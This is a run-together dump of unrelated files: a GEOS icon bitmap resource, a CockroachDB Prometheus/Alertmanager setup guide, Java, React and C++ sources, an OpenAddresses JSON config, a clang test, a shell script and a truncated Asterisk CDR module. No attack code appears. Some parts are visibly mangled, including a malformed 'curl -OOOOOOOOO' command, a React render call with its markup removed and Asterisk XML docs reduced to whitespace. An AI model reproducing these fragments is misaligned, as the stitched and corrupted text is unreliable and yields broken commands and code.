DisconnectButtonSMMoniker = {\r\n\tsize = standard;\r\n\tstyle = icon;\r\n\taspectRatio = normal;\r\n\tcolor = gray1;\r\n\tcachedSize = 48, 30;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSFillBitmapAtCP 186\r\n\t\tBitmap <48,30,0,BMF_MONO>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x80, 0x21, 0x08, 0x02, 0x00\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0x00\r\n\tdb\t0x02, 0xc0, 0x11, 0x10, 0x02, 0x80\r\n\tdb\t0x04, 0xc0, 0x08, 0x20, 0x02, 0x40\r\n\tdb\t0x08, 0xc0, 0x08, 0x20, 0x02, 0x20\r\n\tdb\t0x10, 0xff, 0xc4, 0x4f, 0xfe, 0x10\r\n\tdb\t0x20, 0x00, 0x60, 0x08, 0x00, 0x08\r\n\tdb\t0x40, 0x00, 0x60, 0x08, 0x00, 0x04\r\n\tdb\t0x80, 0x00, 0x60, 0x08, 0x00, 0x02\r\n\tdb\t0x40, 0x00, 0x60, 0x08, 0x00, 0x07\r\n\tdb\t0x20, 0x00, 0x60, 0x08, 0x00, 0x0e\r\n\tdb\t0x10, 0xff, 0xe0, 0x0f, 0xfe, 0x1c\r\n\tdb\t0x08, 0xff, 0xe4, 0x47, 0xfe, 0x38\r\n\tdb\t0x04, 0xc0, 0x08, 0x20, 0x02, 0x70\r\n\tdb\t0x02, 0xc0, 0x08, 0x20, 0x02, 0xe0\r\n\tdb\t0x01, 0xc0, 0x11, 0x10, 0x03, 0xc0\r\n\tdb\t0x00, 0xc0, 0x11, 0x10, 0x03, 0x80\r\n\tdb\t0x00, 0x40, 0x21, 0x08, 0x01, 0x00\r\n\tdb\t0x00, 0x00, 0x01, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSMMonikerResource;\r\n/*\r\n * Moniker generated from PCX/deskicon.pcx with pixel 13 masked out\r\n */\r\nstart AppIconAreaSCGAMonikerResource, data;\r\nvisMoniker DisconnectButtonSCGAMoniker = {\r\n\tsize = tiny;\r\n\tstyle = icon;\r\n\taspectRatio = verySquished;\r\n\tcolor = gray1;\r\n\tcachedSize = 48, 14;\r\n\tgstring {\r\n\t\tGSBeginString\r\n\t\tGSFillBitmapAtCP 90\r\n\t\tBitmap <48,14,0,BMF_MONO>\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x81, 0x81, 0x00, 0x00\r\n\tdb\t0x00, 0xc0, 0x61, 0x86, 0x06, 0x00\r\n\tdb\t0x03, 0x70, 0x19, 0x98, 0x05, 0x80\r\n\tdb\t0x0c, 0x7f, 0x84, 0x23, 0xfc, 0x60\r\n\tdb\t0x30, 0x00, 0xe0, 0x02, 0x00, 0x18\r\n\tdb\t0xc0, 0x00, 0xe0, 0x02, 0x00, 0x07\r\n\tdb\t0x30, 0x00, 0xe0, 0x02, 0x00, 0x1f\r\n\tdb\t0x0c, 0x7f, 0xe0, 0x03, 0xfc, 0x7c\r\n\tdb\t0x03, 0x7f, 0xe4, 0x21, 0xfd, 0xf0\r\n\tdb\t0x00, 0xf0, 0x19, 0x98, 0x07, 0xc0\r\n\tdb\t0x00, 0x30, 0x61, 0x86, 0x01, 0x00\r\n\tdb\t0x00, 0x00, 0x81, 0x81, 0x00, 0x00\r\n\tdb\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00\r\n\t\tGSEndString\r\n\t}\r\n}\r\nend AppIconAreaSCGAMonikerResource;\r\n"} {"text": "Despite CockroachDB's various [built-in safeguards against failure](high-availability.html), it is critical to actively monitor the overall health and performance of a cluster running in production and to create alerting rules that promptly send notifications when there are events that require investigation or intervention.\n\n### Configure Prometheus\n\nEvery node of a CockroachDB cluster exports granular timeseries metrics formatted for easy integration with [Prometheus](https://prometheus.io/), an open source tool for storing, aggregating, and querying timeseries data. This section shows you how to orchestrate Prometheus as part of your Kubernetes cluster and pull these metrics into Prometheus for external monitoring.\n\nThis guidance is based on [CoreOS's Prometheus Operator](https://github.com/coreos/prometheus-operator/blob/master/Documentation/user-guides/getting-started.md), which allows a Prometheus instance to be managed using built-in Kubernetes concepts.\n\n{{site.data.alerts.callout_info}}\nIf you're on Hosted GKE, before starting, make sure the email address associated with your Google Cloud account is part of the `cluster-admin` RBAC group, as shown in [Step 1. Start Kubernetes](#hosted-gke).\n{{site.data.alerts.end}}\n\n1. From your local workstation, edit the `cockroachdb` service to add the `prometheus: cockroachdb` label:\n\n
\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl label svc cockroachdb prometheus=cockroachdb\n ~~~\n\n ~~~\n service/cockroachdb labeled\n ~~~\n\n This ensures that there is a Prometheus job and monitoring data only for the `cockroachdb` service, not for the `cockroach-public` service.\n
\n\n
\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl label svc my-release-cockroachdb prometheus=cockroachdb\n ~~~\n\n ~~~\n service/my-release-cockroachdb labeled\n ~~~\n\n This ensures that there is a Prometheus job and monitoring data only for the `my-release-cockroachdb` service, not for the `my-release-cockroach-public` service.\n
\n\n2. Install [CoreOS's Prometheus Operator](https://raw.githubusercontent.com/coreos/prometheus-operator/release-0.20/bundle.yaml):\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl apply \\\n -f https://raw.githubusercontent.com/coreos/prometheus-operator/release-0.20/bundle.yaml\n ~~~\n\n ~~~\n clusterrolebinding.rbac.authorization.k8s.io/prometheus-operator created\n clusterrole.rbac.authorization.k8s.io/prometheus-operator created\n serviceaccount/prometheus-operator created\n deployment.apps/prometheus-operator created\n ~~~\n\n3. Confirm that the `prometheus-operator` has started:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl get deploy prometheus-operator\n ~~~\n\n ~~~\n NAME READY UP-TO-DATE AVAILABLE AGE\n prometheus-operator 1/1 1 1 27s\n ~~~\n\n4. Use our [`prometheus.yaml`](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/prometheus.yaml) file to create the various objects necessary to run a Prometheus instance:\n\n {{site.data.alerts.callout_success}}\n This configuration defaults to using the Kubernetes CA for authentication.\n {{site.data.alerts.end}}\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl apply \\\n -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/prometheus.yaml\n ~~~\n\n ~~~\n serviceaccount/prometheus created\n clusterrole.rbac.authorization.k8s.io/prometheus created\n clusterrolebinding.rbac.authorization.k8s.io/prometheus created\n servicemonitor.monitoring.coreos.com/cockroachdb created\n prometheus.monitoring.coreos.com/cockroachdb created\n ~~~\n\n5. Access the Prometheus UI locally and verify that CockroachDB is feeding data into Prometheus:\n\n 1. Port-forward from your local machine to the pod running Prometheus:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl port-forward prometheus-cockroachdb-0 9090\n ~~~\n\n 2. Go to http://localhost:9090 in your browser.\n\n 3. To verify that each CockroachDB node is connected to Prometheus, go to **Status > Targets**. The screen should look like this:\n\n \"Prometheus\n\n 4. To verify that data is being collected, go to **Graph**, enter the `sys_uptime` variable in the field, click **Execute**, and then click the **Graph** tab. The screen should like this:\n\n \"Prometheus\n\n {{site.data.alerts.callout_success}}\n Prometheus auto-completes CockroachDB time series metrics for you, but if you want to see a full listing, with descriptions, port-forward as described in {% if page.secure == true %}[Access the Admin UI](#step-4-access-the-admin-ui){% else %}[Access the Admin UI](#step-4-access-the-admin-ui){% endif %} and then point your browser to http://localhost:8080/_status/vars.\n\n For more details on using the Prometheus UI, see their [official documentation](https://prometheus.io/docs/introduction/getting_started/).\n {{site.data.alerts.end}}\n\n### Configure Alertmanager\n\nActive monitoring helps you spot problems early, but it is also essential to send notifications when there are events that require investigation or intervention. This section shows you how to use [Alertmanager](https://prometheus.io/docs/alerting/alertmanager/) and CockroachDB's starter [alerting rules](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alert-rules.yaml) to do this.\n\n1. Download our alertmanager-config.yaml configuration file:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ curl -OOOOOOOOO \\\n https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alertmanager-config.yaml\n ~~~\n\n2. Edit the `alertmanager-config.yaml` file to [specify the desired receivers for notifications](https://prometheus.io/docs/alerting/configuration/#receiver). Initially, the file contains a placeholder web hook.\n\n3. Add this configuration to the Kubernetes cluster as a secret, renaming it to `alertmanager.yaml` and labelling it to make it easier to find:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl create secret generic alertmanager-cockroachdb \\\n --from-file=alertmanager.yaml=alertmanager-config.yaml\n ~~~\n\n ~~~\n secret/alertmanager-cockroachdb created\n ~~~\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl label secret alertmanager-cockroachdb app=cockroachdb\n ~~~\n\n ~~~\n secret/alertmanager-cockroachdb labeled\n ~~~\n\n {{site.data.alerts.callout_danger}}\n The name of the secret, `alertmanager-cockroachdb`, must match the name used in the `alertmanager.yaml` file. If they differ, the Alertmanager instance will start without configuration, and nothing will happen.\n {{site.data.alerts.end}}\n\n4. Use our [`alertmanager.yaml`](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alertmanager.yaml) file to create the various objects necessary to run an Alertmanager instance, including a ClusterIP service so that Prometheus can forward alerts:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl apply \\\n -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alertmanager.yaml\n ~~~\n\n ~~~\n alertmanager.monitoring.coreos.com/cockroachdb created\n service/alertmanager-cockroachdb created\n ~~~\n\n5. Verify that Alertmanager is running:\n\n 1. Port-forward from your local machine to the pod running Alertmanager:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl port-forward alertmanager-cockroachdb-0 9093\n ~~~\n\n 2. Go to http://localhost:9093 in your browser. The screen should look like this:\n\n \"Alertmanager\"\n\n6. Ensure that the Alertmanagers are visible to Prometheus by opening http://localhost:9090/status. The screen should look like this:\n\n \"Alertmanager\"\n\n7. Add CockroachDB's starter [alerting rules](https://github.com/cockroachdb/cockroach/blob/master/cloud/kubernetes/prometheus/alert-rules.yaml):\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl apply \\\n -f https://raw.githubusercontent.com/cockroachdb/cockroach/master/cloud/kubernetes/prometheus/alert-rules.yaml\n ~~~\n\n ~~~\n prometheusrule.monitoring.coreos.com/prometheus-cockroachdb-rules created\n ~~~\n\n8. Ensure that the rules are visible to Prometheus by opening http://localhost:9090/rules. The screen should look like this:\n\n \"Alertmanager\"\n\n9. Verify that the `TestAlertManager` example alert is firing by opening http://localhost:9090/alerts. The screen should look like this:\n\n \"Alertmanager\"\n\n10. To remove the example alert:\n\n 1. Use the `kubectl edit` command to open the rules for editing:\n\n {% include copy-clipboard.html %}\n ~~~ shell\n $ kubectl edit prometheusrules prometheus-cockroachdb-rules\n ~~~\n\n 2. Remove the `dummy.rules` block and save the file:\n\n ~~~\n - name: rules/dummy.rules\n rules:\n - alert: TestAlertManager\n expr: vector(1)\n ~~~\n"} {"text": "/*\n * Copyright 2008-2012 the original author or authors.\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.mycompany.controller.checkout;\n\nimport org.broadleafcommerce.core.web.controller.checkout.BroadleafOrderConfirmationController;\nimport org.springframework.stereotype.Controller;\nimport org.springframework.ui.Model;\nimport org.springframework.web.bind.annotation.PathVariable;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RequestMethod;\n\nimport javax.servlet.http.HttpServletRequest;\nimport javax.servlet.http.HttpServletResponse;\n\n@Controller\npublic class OrderConfirmationController extends BroadleafOrderConfirmationController {\n \n @Override\n @RequestMapping(value = \"/confirmation/{orderNumber}\", method = RequestMethod.GET)\n public String displayOrderConfirmationByOrderNumber(@PathVariable(\"orderNumber\") String orderNumber, Model model,\n HttpServletRequest request, HttpServletResponse response) {\n return super.displayOrderConfirmationByOrderNumber(orderNumber, model, request, response);\n }\n\n}\n"} {"text": "import React from 'react';\r\nimport ReactDOMServer from 'react-dom/server';\r\nimport ServerHtml from './ServerHtml';\r\nimport componentFactory from './componentFactory';\r\n\r\nexport function serverRenderer(renderingData, viewBag) {\r\n const { componentName, uid: renderingUid } = renderingData.rendering;\r\n const ComponentInstance = componentFactory(componentName);\r\n const componentProps = {\r\n ...renderingData,\r\n viewBag,\r\n };\r\n\r\n // is the HTML wrapper (div) around the component contents when SSR-ing\r\n // Necessary because ReactDOM.render() or .hydrate() needs a DOM element in which to mount the component.\r\n const result = ReactDOMServer.renderToString(\r\n \r\n \r\n \r\n );\r\n\r\n return result;\r\n}\r\n"} {"text": "#include \"adriadialog.h\"\n#include \"../../faworld/item/itembase.h\"\n#include \"../guimanager.h\"\n#include \"../shopdialogs.h\"\n\nnamespace FAGui\n{\n AdriaDialog::AdriaDialog(GuiManager& guiManager, FAWorld::Actor* actor)\n : CharacterDialoguePopup(guiManager, false, \"sfx/towners/Witch38.wav\"), mActor(actor)\n {\n auto& gossipData = mActor->getGossipData();\n for (auto& gossip : gossipData)\n {\n if (gossip.first == \"general1\")\n gossip.second.talkAudioPath = \"sfx/towners/witch39.wav\";\n\n else if (gossip.first == \"general2\")\n gossip.second.talkAudioPath = \"sfx/towners/witch40.wav\";\n\n else if (gossip.first == \"general3\")\n gossip.second.talkAudioPath = \"sfx/towners/witch41.wav\";\n\n else if (gossip.first == \"general4\")\n gossip.second.talkAudioPath = \"sfx/towners/witch42.wav\";\n\n else if (gossip.first == \"cain\")\n gossip.second.talkAudioPath = \"sfx/towners/witch45.wav\";\n\n else if (gossip.first == \"farnham\")\n gossip.second.talkAudioPath = \"sfx/towners/witch46.wav\";\n\n else if (gossip.first == \"gillian\")\n gossip.second.talkAudioPath = \"sfx/towners/witch44.wav\";\n\n else if (gossip.first == \"griswold\")\n gossip.second.talkAudioPath = \"sfx/towners/witch43.wav\";\n\n else if (gossip.first == \"ogden\")\n gossip.second.talkAudioPath = \"sfx/towners/witch50.wav\";\n\n else if (gossip.first == \"pepin\")\n gossip.second.talkAudioPath = \"sfx/towners/witch47.wav\";\n\n else if (gossip.first == \"priest\")\n gossip.second.talkAudioPath = \"sfx/towners/witch48.wav\";\n\n else if (gossip.first == \"wirt\")\n gossip.second.talkAudioPath = \"sfx/towners/witch49.wav\";\n }\n\n // auto& questData = mActor->getQuestTalkData();\n // for (auto& quest : questData)\n // {\n // if (quest.first == \"anvilOfFury\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"archbishopLazarus\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"blackMushroom\")\n // {\n // quest.second.activation.talkAudioPath = \"\";\n // quest.second.returned[0].talkAudioPath = \"\";\n // quest.second.returned[1].talkAudioPath = \"\";\n // quest.second.returned[2].talkAudioPath = \"\";\n // quest.second.completion.talkAudioPath = \"\";\n // }\n //\n // else if (quest.first == \"hallsOfTheBlind\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"lachdanan\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"ogdensSign\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"poisonedWaterSupply\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theButcher\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theChamberOfBone\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theCurseOfKingLeoric\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"theMagicRock\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"valor\")\n // quest.second.info.talkAudioPath = \"\";\n //\n // else if (quest.first == \"warlordOfBlood\")\n // quest.second.info.talkAudioPath = \"\";\n // }\n }\n\n CharacterDialoguePopup::DialogData AdriaDialog::getDialogData()\n {\n DialogData retval;\n auto& td = mActor->getMenuTalkData();\n\n retval.introduction = {{td.at(\"introductionHeader\"), TextColor::golden, false}};\n\n retval.addMenuOption({{td.at(\"introduction\"), TextColor::golden, false}, {}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n\n retval.addMenuOption({{td.at(\"talk\"), TextColor::blue}}, [this]() {\n openTalkDialog(mActor);\n return CharacterDialoguePopup::UpdateResult::DoNothing;\n });\n retval.addMenuOption({{td.at(\"buy\")}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n retval.addMenuOption({{td.at(\"sell\")}}, [this]() {\n this->openSellDialog();\n return CharacterDialoguePopup::UpdateResult::DoNothing;\n });\n retval.addMenuOption({{td.at(\"recharge\")}}, []() { return CharacterDialoguePopup::UpdateResult::DoNothing; });\n retval.addMenuOption({{td.at(\"quit\")}}, []() { return CharacterDialoguePopup::UpdateResult::PopDialog; });\n\n return retval;\n }\n\n void AdriaDialog::openSellDialog()\n {\n auto dialog = new ShopSellDialog(mGuiManager, *mActor, adriaSellFilter);\n mGuiManager.mDialogManager.pushDialog(dialog);\n }\n\n bool AdriaDialog::adriaSellFilter(const FAWorld::Item* item)\n {\n // TODO: add check for quest items\n return item->getBase()->mType == ItemType::misc || item->getBase()->mType == ItemType::staff;\n }\n}\n"} {"text": "{\n \"coverage\": {\n \"country\": \"ca\",\n \"state\": \"on\",\n \"county\": \"Norfolk\"\n },\n \"schema\": 2,\n \"layers\": {\n \"addresses\": [\n {\n \"name\": \"county\",\n \"website\": \"http://opendata.norfolkcounty.ca/datasets/civic-addresses\",\n \"data\": \"https://services1.arcgis.com/mSGV2hCLXHNsfQqK/arcgis/rest/services/CivicAddresses/FeatureServer/0\",\n \"license\": {\n \"url\": \"http://data-norfolk.opendata.arcgis.com/pages/terms-of-use\",\n \"text\": \"Contains public sector Information made available under Norfolk County's Open Data Licence\",\n \"attribution\": true,\n \"share-alike\": false\n },\n \"protocol\": \"ESRI\",\n \"conform\": {\n \"format\": \"geojson\",\n \"number\": \"NUMBER_\",\n \"street\": [\n \"Bell_Name\",\n \"Bell_Suf\",\n \"Bell_Dir\"\n ],\n \"unit\": \"UnitNumber\"\n }\n }\n ]\n }\n}\n"} {"text": "// Test that call site debug info is (un)supported in various configurations.\n\n// Supported: DWARF5, -O1, standalone DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debug-info-kind=standalone -dwarf-version=5 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DISubprogram -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + LLDB tuning, -O1, limited DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DISubprogram -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + GDB tuning by using '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O1 -disable-llvm-passes -debugger-tuning=gdb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DIFlagAllCallsDescribed\n\n// Supported: DWARF4 + LLDB tuning by using '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O1 -disable-llvm-passes -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=HAS-ATTR \\\n// RUN: -implicit-check-not=DIFlagAllCallsDescribed\n\n// Unsupported: -O0 + '-femit-debug-entry-values'\n// RUN: %clang_cc1 -femit-debug-entry-values -emit-llvm -triple x86_64-linux-gnu \\\n// RUN: %s -o - -O0 -disable-llvm-passes -debugger-tuning=gdb \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// Supported: DWARF4 + LLDB tuning, -O1, line-tables only DI\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debugger-tuning=lldb \\\n// RUN: -debug-info-kind=line-tables-only -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=LINE-TABLES-ONLY\n\n// Unsupported: -O0\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O0 \\\n// RUN: -debug-info-kind=standalone -dwarf-version=5 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// Unsupported: DWARF4\n// RUN: %clang_cc1 -emit-llvm -triple %itanium_abi_triple %s -o - \\\n// RUN: -O1 -disable-llvm-passes \\\n// RUN: -debug-info-kind=standalone -dwarf-version=4 \\\n// RUN: | FileCheck %s -check-prefix=NO-ATTR\n\n// NO-ATTR-NOT: FlagAllCallsDescribed\n\n// HAS-ATTR-DAG: DISubprogram(name: \"declaration1\", {{.*}}, flags: DIFlagPrototyped\n// HAS-ATTR-DAG: DISubprogram(name: \"declaration2\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"struct1\", {{.*}}, flags: DIFlagPrototyped, spFlags: DISPFlagOptimized)\n// HAS-ATTR-DAG: DISubprogram(name: \"struct1\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"method1\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n// HAS-ATTR-DAG: DISubprogram(name: \"force_irgen\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n\n// LINE-TABLES-ONLY: DISubprogram(name: \"force_irgen\", {{.*}}, flags: DIFlagPrototyped | DIFlagAllCallsDescribed, spFlags: DISPFlagDefinition\n\nvoid declaration1();\n\nvoid declaration2();\n\nvoid declaration2() {}\n\nstruct struct1 {\n struct1() {}\n void method1() {}\n};\n\nvoid __attribute__((optnone)) force_irgen() {\n declaration1();\n struct1().method1();\n}\n"} {"text": "#!/bin/sh -e\ntrap 'exit 2' HUP INT PIPE TERM\nif [ \"$1\" = -fork ]; then\n\tshift\n\tfor d in `dirname $0`/build*; do\n\t\t(cd ./$d\n\t\t echo n | ./mvm \"$@\") &\n\tdone\n\twait\nelse\n\tfor d in `dirname $0`/build*; do\n\t\t(cd ./$d\n\t\t echo n | ./mvm \"$@\")\n\tdone\nfi\n"} {"text": "/*\n * Asterisk -- An open source telephony toolkit.\n *\n * Copyright (C) 1999-2006, Digium, Inc.\n *\n * Portions Copyright (C) 2005, Anthony Minessale II\n *\n * See http://www.asterisk.org for more information about\n * the Asterisk project. Please do not directly contact\n * any of the maintainers of this project for assistance;\n * the project provides a web site, mailing lists and IRC\n * channels for your use.\n *\n * This program is free software, distributed under the terms of\n * the GNU General Public License Version 2. See the LICENSE file\n * at the top of the source tree.\n */\n\n/*! \\file\n *\n * \\brief Call Detail Record related dialplan functions\n *\n * \\author Anthony Minessale II\n *\n * \\ingroup functions\n */\n\n/*** MODULEINFO\n\tcore\n ***/\n\n#include \"asterisk.h\"\n\n#include \"asterisk/module.h\"\n#include \"asterisk/channel.h\"\n#include \"asterisk/pbx.h\"\n#include \"asterisk/utils.h\"\n#include \"asterisk/app.h\"\n#include \"asterisk/cdr.h\"\n#include \"asterisk/stasis.h\"\n#include \"asterisk/stasis_message_router.h\"\n\n/*** DOCUMENTATION\n\t\n\t\t\n\t\t\tGets or sets a CDR variable.\n\t\t\n\t\t\n\t\t\t\n\t\t\t\tCDR field name:\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tCaller ID.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tLast application arguments.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe final state of the CDR.\n\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tNO ANSWER\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tNO ANSWER (NULL record)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tFAILED\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tBUSY\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tANSWERED\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tCONGESTION\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSource.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call started.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tR/W the Automatic Message Accounting (AMA) flags on the channel.\n\t\t\t\t\t\tWhen read from a channel, the integer value will always be returned.\n\t\t\t\t\t\tWhen written to a channel, both the string format or integer value\n\t\t\t\t\t\tis accepted.\n\t\t\t\t\t\t\n\t\t\t\t\t\t\tOMIT\n\t\t\t\t\t\t\tBILLING\n\t\t\t\t\t\t\tDOCUMENTATION\n\t\t\t\t\t\t\n\t\t\t\t\t\tAccessing this setting is deprecated in CDR. Please use the CHANNEL function instead.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call was answered.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's account code.\n\t\t\t\t\t\tAccessing this setting is deprecated in CDR. Please use the CHANNEL function instead.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination context.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tTime the call ended.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's unique id.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDestination channel.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDuration of the call.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe channel's user specified field.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tLast application.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tDuration of the call once it was answered.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tChannel name.\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tCDR sequence number.\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\t\n\t\t\tAll of the CDR field names are read-only, except for accountcode,\n\t\t\tuserfield, and amaflags. You may, however, supply\n\t\t\ta name not on the above list, and create your own variable, whose value can be changed\n\t\t\twith this function, and this variable will be stored on the CDR.\n\t\t\tCDRs can only be modified before the bridge between two channels is\n\t\t\ttorn down. For example, CDRs may not be modified after the Dial\n\t\t\tapplication has returned.\n\t\t\tExample: exten => 1,1,Set(CDR(userfield)=test)\n\t\t\n\t\n\t\n\t\t\n\t\t\tSet a property on a channel's CDR.\n\t\t\n\t\t\n\t\t\t\n\t\t\t\tThe property to set on the CDR.\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSet this channel as the preferred Party A when\n\t\t\t\t\t\tchannels are associated together.\n\t\t\t\t\t\tWrite-Only\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tSetting to 1 will disable CDRs for this channel.\n\t\t\t\t\t\tSetting to 0 will enable CDRs for this 